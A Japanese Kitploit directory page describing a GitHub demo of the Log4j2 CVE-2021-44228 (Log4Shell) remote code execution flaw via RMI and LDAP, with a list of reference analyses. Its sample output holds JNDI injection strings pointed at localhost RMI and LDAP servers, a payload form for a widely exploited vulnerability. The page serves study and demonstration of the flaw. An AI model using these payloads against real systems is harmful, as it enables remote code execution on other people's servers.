Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44228-Demo — Apache Log4j2 CVE-2021-44228 RCE デモ(RMI および LDAP を使用) | Kitploit
ツール/GitHubGitHub/mzlogin/cve-2021-44228-demo
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育リモートアクセスツール
GitHubmzlogin/cve-2021-44228-demo

CVE-2021-44228-Demo

Apache Log4j2 CVE-2021-44228 RCE デモ(RMI および LDAP を使用)

リポジトリを見る
234年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-44228-Demo

CVE-2021-44228 を利用し、RMI と LDAP の 2 つの方法でコードをリモートから注入する例です。

root@kitploit:~
Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}

RmiServer と LdapServer の起動は Python3 に依存します。

参考

  • Apache Log4j2 リモートコード実行の脆弱性を再現
  • Log4j 高危漏洞!具体的な原因を解析!全网初! と Log4j 高危漏洞 (補足動画)
  • Log4j Lookups
  • Apache Log4j2 の RCE から RC1 バイパスまで
  • tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
  • PSA: Log4Shell and the current state of JNDI injection
ツールをダウンロード